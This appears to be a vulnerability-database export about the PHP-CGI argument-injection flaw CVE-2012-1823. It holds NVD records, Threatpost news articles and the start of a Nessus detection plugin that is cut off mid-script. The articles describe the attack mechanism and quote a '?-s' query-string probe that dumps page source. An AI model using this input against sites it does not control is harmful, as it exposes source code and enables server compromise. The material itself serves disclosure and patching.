"cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0b10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta_4_patch1:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:59:47", "description": "sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.", "edition": 6, "cvss3": {}, "published": "2012-05-11T10:15:00", "title": "CVE-2012-1823", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1823"], "modified": 
"2018-01-18T02:29:00", "cpe": ["cpe:/a:php:php:5.1.5", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.2.12", "cpe:/a:php:php:5.4.1", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.11", "cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.2.9", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.3.8", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.3.9", "cpe:/a:php:php:5.4.0", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:5.3.10", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:5.3.1", "cpe:/a:php:php:5.2.10", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.3.0", "cpe:/a:php:php:5.2.15", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.3.11", "cpe:/a:php:php:5.2.13", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.3.7", "cpe:/a:php:php:5.2.17", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.3.2", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:5.3.3", "cpe:/a:php:php:5.0.0", "cpe:/a:php:php:5.2.14", "cpe:/a:php:php:5.2.16"], "id": "CVE-2012-1823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", 
"cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2018-10-06T23:03:08", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-1863", "CVE-2012-2311"], "description": "**UPDATE**\u2013The developers of PHP have released new versions of the scripting language to fix a [remotely exploitable vulnerability](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) announced earlier this week that enables an attacker to pass command-line arguments to the PHP binary. 
The flaw has been in the code for more than eight years and The PHP Group was working on a patch for it when the bug was disclosed accidentally on Reddit. However, the team that found the bug says the new versions of PHP don\u2019t actually fix the vulnerability. \n\nThe new versions of PHP are available now and the developers recommend that users upgrade as soon as possible. PHP versions 5.3.12 and 5.4.2 both contain the fix for the vulnerability. \n\n\u201cWe\u2019ve tested this and have confirmed that the query parameters are passed to the php5-cgi binary in this configuration. Since the wrapper script merely passes all the arguments on to the actual php-cgi binary, the same problem exists with configurations where php-cgi is directly copied into the cgi-bin directory. It\u2019s interesting to note that while slashes get added to any shell metacharacters we pass in the query string, spaces and dashes (\u2018-\u2019) are not escaped. So we can pass as many options to PHP as we want!\u201d the team that discovered the flaw, known as [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>), wrote in their analysis of the bug. \n\nEindbazen said in an updated post that the PHP patch isn\u2019t sufficient to fix the bug.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nThe PHP Group is working on a new fix for the vulnerability now.\n\n\u201cWe have received word that new PHP updates with the revised fix will be released soon. 
The issue that this problem was not properly fixed by the original security update is being tracked as CVE-2012-2311,\u201d Eindbazen said.\n\nThe PHP Group also had some other problems this week, specifically a problem in its internal bug-handling system that resulted in the private discussion on the CVE-2012-1823 vulnerability being marked as public. That led to the bug being posted to Reddit. The Eindbazen team then posted the details of the bug, which they had discovered in January during a capture the flag contest.\n\n\u201cThere is a vulnerability in certain CGI-based setups **(Apache+mod_php and nginx+php-fpm are not affected)** that has gone unnoticed for at least 8 years. [Section 7 of the CGI spec](<http://tools.ietf.org/html/draft-robinson-www-interface-00#section-7>) states:\n\nSome systems support a method for supplying a [sic] array of strings to the CGI script. This is only used in the case of an `indexed\u2019 query. This is identified by a \u201cGET\u201d or \u201cHEAD\u201d HTTP request with a URL search string not containing any unencoded \u201c=\u201d characters.\n\nSo, requests that do not have a \u201c=\u201d in the query string are treated differently from those who do in some CGI implementations. For PHP this means that a request containing ?-s may dump the PHP source code for the page, but a request that has ?-s&=1 is fine.\n\nA large number of sites run PHP as either an Apache module through mod_php or using php-fpm under nginx. Neither of these setups are vulnerable to this. Straight shebang-style CGI also does not appear to be vulnerable,\u201d the [PHP Group](<http://www.php.net/archive/2012.php#id2012-05-03-1>) said in its release notes for the new versions. \u201cIf you are using Apache mod_cgi to run PHP you may be vulnerable. To see if you are, just add ?-s to the end of any of your URLs. If you see your source code, you are vulnerable. 
If your site renders normally, you are not.\n\nThe PHP developers said that while the new versions of the language should work for most users, it may not be feasible for some users to update much older versions of PHP. In that case, users can deploy a workaround.\n\n\u201cAn alternative is to configure your web server to not let these types of requests with query strings starting with a \u201c-\u201d and not containing a \u201c=\u201d through. Adding a rule like this should not break any sites,\u201d they said.\n", "modified": "2013-04-17T16:32:18", "published": "2012-05-04T14:26:46", "id": "THREATPOST:9FD19F2ACF1E3C44BAE775A250F1E132", "href": "https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/76524/", "type": "threatpost", "title": "PHP Group Releases New Versions, But Patch Doesn't Fix CVE-2012-1823 Bug", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:06", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-1863", "CVE-2012-2311", "CVE-2012-2329"], "description": "For the second time in less than a week, the developers of PHP have released new versions of the language that include a fix for the remotely exploitable vulnerability that was disclosed last week. The group is encouraging users to upgrade to PHP 5.4.3 or 5.3.13 immediately. \n\nThe [vulnerability affects PHP](<https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/>) sites in CGI-based setups and can enable an attacker to get access to the site\u2019s source code by passing certain queries to the PHP binary as command-line arguments. The bug was disclosed last week before a patch was available through a mistake in the PHP Group\u2019s internal bug-handling system.\n\n\u201cThe PHP development team would like to announce the immediate availability of PHP 5.4.3 and PHP 5.3.13. 
All users are encouraged to upgrade to PHP 5.4.3 or PHP 5.3.13\n\nThe releases complete a fix for a [vulnerability](<http://www.php.net/archive/2012.php#id2012-05-03-1>) in CGI-based setups (CVE-2012-2311). _Note: mod_php and php-fpm are not vulnerable to this attack,\u201d _the PHP developers said.\n\n\u201cPHP 5.4.3 fixes a buffer overflow vulnerability in the [apache_request_headers()](<http://php.net/manual/function.apache-request-headers.php>) (CVE-2012-2329). The PHP 5.3 series is not vulnerable to this issue.\u201d\n\nThe PHP Group [released a fix for the bug](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) late last week, but the researchers who discovered the flaw originally found that the new versions didn\u2019t completely address the problem and still left vulnerable sites exposed to attack. There are mitigations available for the bug, as explained by the [Eindbazen](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>) team that found the flaw, but users should upgrade their installations as soon as they can.\n", "modified": "2013-04-17T16:32:16", "published": "2012-05-09T14:32:23", "id": "THREATPOST:3EEA9D9B7CBDC9687FD961AD1AF59EF5", "href": "https://threatpost.com/another-set-php-releases-pushed-out-fix-cve-2012-1823-flaw-050912/76544/", "type": "threatpost", "title": "Another Set of PHP Releases Pushed Out to Fix CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:09", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "[](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>)The PHP Group on Tuesday is planning to release another new version of the scripting language that\u2019s designed to address, again, the [remotely exploitable flaw](<https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/>) that came to light last 
week. That bug, which requires no authentication, was supposed to have been fixed in new releases pushed out on May 3, but they didn\u2019t completely address the problem.\n\nAfter The [PHP Group released new versions](<https://threatpost.com/php-group-releases-new-versions-patch-doesnt-fix-cve-2012-1823-bug-050412/>) of the language, the research team that initially discovered the flaw warned that the fixes didn\u2019t completely address the issue and still left sites vulnerable. The researchers, known as Eindbazen, discovered the vulnerability during a capture the flag competition earlier this year and were working with PHP developers and US-CERT on a fix. But the bug was disclosed accidentally when the PHP internal tracking system mistakenly marked the bug as public before a patch was ready.\n\nThe PHP Group on Friday released two new versions of the language, but Eindbazen said that they did not completely fix the problem.\n\n\u201cThe new PHP release is buggy. You can use their mitigation mod_rewrite rule, but the patch and new released versions do not fix the problem. At the bottom we have added a version of the PHP patch that fixes the obvious problem with the patch merged in the recently released security update,\u201d the team said. \n\nNow, the PHP developers are planning to push out another new release on Tuesday to hopefully fix the flaw.\n\n\u201cPHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use **$*** instead of **\u201c$@\u201d** to pass parameters to php-cgi which causes a number of issues. Again, people using mod_php or php-fpm are not affected,\u201d The PHP Group said.\n\n\u201cAnother set of releases are planned for Tuesday, May, 8th. 
These releases will fix the CGI flaw and another CGI-related issue in apache_request_header (5.4 only).\u201d\n\n \n\n", "modified": "2013-04-17T16:32:17", "published": "2012-05-08T14:46:23", "id": "THREATPOST:4E1049C3C10581837DF71F684CB00683", "href": "https://threatpost.com/php-group-set-release-another-patch-cve-2012-1823-flaw-050812/76537/", "type": "threatpost", "title": "PHP Group Set to Release Another Patch for CVE-2012-1823 Flaw", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T23:03:07", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "The U.S.\u2019s Cyber Command is using special, classified briefings with private sector CEOs to scare them into greater vigilance about the threat of cyber attacks, according to an NPR report.\n\nThe report, quoting unnamed participants in the classified, 2010 briefings said that government officials including Cyber Command Chief Gen. Keith Alexander and representatives from DoD, DHS and office of the Director of National Intelligence \u201cscared the bejeezus\u201d out of CEOs from leading technology firms like Dell and HP.\n\nThe briefings were part of a three-year-old program dubbed the \u201cEnduring Security Framework\u201d that was designed to foster closer coordination between private sector executives and Washington. According to [the NPR report](<http://m.npr.org/news/front/152296621?page=3>), the executives are granted a temporary, one-day classified clearance and treated to a peek under the covers at some of the offensive cyber tools that are at the disposal of cyber warriors at the NSA, CIA and the Pentagon. The idea, according to public testimony by Alexander and Mike McConnell, the former U.S. 
director of national intelligence, is to show what the U.S.\u2019s cyber offensive capabilities are, with an eye to preparing private firms for what might be [leveraged against them by nation-backed attackers](<http://m.npr.org/news/front/152296621?page=2>).\n\nAmong the attacks highlighted by government officials was a firmware-based attack that could \u201cbrick\u201d hardware by leading manufacturers, the sources told NPR.\n\nLegislation pending on Capitol Hill, including the recently defeated SOPA (Stop Online Piracy Act) and the [controversial Cyber Intelligence Sharing and Protection Act (CISPA)](<https://threatpost.com/cispa-passes-house-cacophony-groans-and-cheers-042712/>) provides new mechanisms for information sharing between the government and private entities. However, privacy advocates such as the Center for Democracy and Technology have expressed concern about the bills\u2019 support for wide ranging, warrantless government surveillance of ordinary citizens. \n", "modified": "2013-04-17T16:32:16", "published": "2012-05-09T18:39:14", "id": "THREATPOST:51FB010AA47AEB7BA9A071B3DC8D9989", "href": "https://threatpost.com/us-cyber-command-using-classified-intel-scare-ceos-action-050912/76545/", "type": "threatpost", "title": "U.S. Cyber Command Using Classified Intel To Scare CEOs To Action", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:59:10", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823"], "description": "Close to two years ago, a [serious vulnerability in PHP was accidentally disclosed](<http://threatpost.com/serious-remote-php-bug-accidentally-disclosed-050312/76517>) after it was discovered months prior during a hacking contest. 
A patch was released in relatively short order, and one would assume that given PHP\u2019s prevalence as a web development framework, the fix would have been applied just as quickly.\n\nBut given the discovery last October of a new set of exploits for [CVE-2012-1823](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>), that assumption may not be correct.\n\nResearchers at [Imperva](<http://blog.imperva.com/2014/03/threat-advisory-php-cgi-at-your-command.html>) have been watching attacks exploiting the PHP bug since Oct. 29. Attackers were using the new exploit to deliver arbitrary code to websites running PHP 5.4.x before 5.4.2 or 5.3.x before 5.3.12; those vulnerable versions account for about 16 percent of the sites on the web according to director of security research Barry Shteiman.\n\nThe new exploits were dangerous in that they allowed hackers to abuse an old vulnerability to not only run arbitrary code, but also adapt techniques found in botnets and crimeware kits to inject malware, steal credentials or system data from the server, or move laterally within the data center.\n\n\u201cNot only are we seeing a vulnerability used after it was released so long ago, but what we\u2019re seeing is attackers and professional hackers understanding what vendors understand\u2014people just don\u2019t patch,\u201d Shteiman said. \u201cThey can\u2019t or won\u2019t or are not minded to fix these problems.\u201d\n\nPHP is found on nearly 82 percent of websites today; these attacks target sites where PHP is running with CGI as an option, creating a condition that allows for code execution from the outside. Shteiman said the vulnerability affects a built-in mechanism in PHP that protects itself from exposing files and commands. 
A configuration flaw allows hackers to first disable the security mechanism, which in turn allows a hacker to run remote code or arbitrarily inject code.\n\n\u201cWith the new exploit, it\u2019s the same relative technique, but what we\u2019ve seen is a lot of automation,\u201d Shteiman said. \u201cThe tool that attacked these systems is running an interesting subset of dictionaries that requires an attacker know where PHP is installed on the server. We\u2019ve seen attackers trying different paths to see which backend contains the [PHP] executable.\u201d\n\nThe big-picture problem is the number of PHP websites still running vulnerable code despite the availability of a patch for close to two years now.\n\n\u201cPHP is installed as an interpreter,\u201d Shteiman said. \u201cReplacing the existing instance of PHP with a new one means downtime. Sometimes you may have to change applications because some things that are now deprecated may require application changes. For that reason, sometimes organizations don\u2019t patch or go a different route. They might use a new framework instead.\u201d\n\nOriginal reports on the vulnerability triggered advisories from a number of organizations, including US-CERT. The bug is a relatively simple one; researchers found that when they passed a specific query string that contained the -s command to PHP in a CGI setup, PHP would interpret the -s as the command line argument and result in the disclosure of the source code for the application. They extended their testing and found they could pass whatever command-line arguments they wanted to the PHP binary.\n\n\u201cYou\u2019d think these bugs would be long forgotten, but it isn\u2019t so; they\u2019re like the undead. Vulnerabilities never die,\u201d Shteiman said. 
\u201cThey don\u2019t die and we realize if we see this executed by botnets trying to onboard servers and by crimeware kits being sold, that means attackers understand they can rely on old problems because people won\u2019t fix them and attackers don\u2019t have to work too hard.\u201d\n", "modified": "2014-03-19T16:12:20", "published": "2014-03-19T12:12:20", "id": "THREATPOST:A5E5D5921DAB8BB3CACFA91664901B61", "href": "https://threatpost.com/new-exploits-arrive-for-old-php-vulnerability/104881/", "type": "threatpost", "title": "Exploits for Two-Year-Old PHP Security Vulnerability Found", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T10:10:37", "description": "The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-29T00:00:00", "title": "Fedora 15 : maniadrive-1.2-32.fc15.5 / php-5.3.13-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15.5 (2012-7567)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "modified": "2012-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2012-7567.NASL", "href": "https://www.tenable.com/plugins/nessus/59265", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-7567.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59265);\n script_version(\"1.16\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_xref(name:\"FEDORA\", value:\"2012-7567\");\n\n script_name(english:\"Fedora 15 : maniadrive-1.2-32.fc15.5 / php-5.3.13-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15.5 (2012-7567)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The releases complete a fix for a vulnerability in CGI-based setups\n(CVE-2012-2311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=818907\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?330ef760\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081334.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a78f4509\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/081335.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?978265c4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
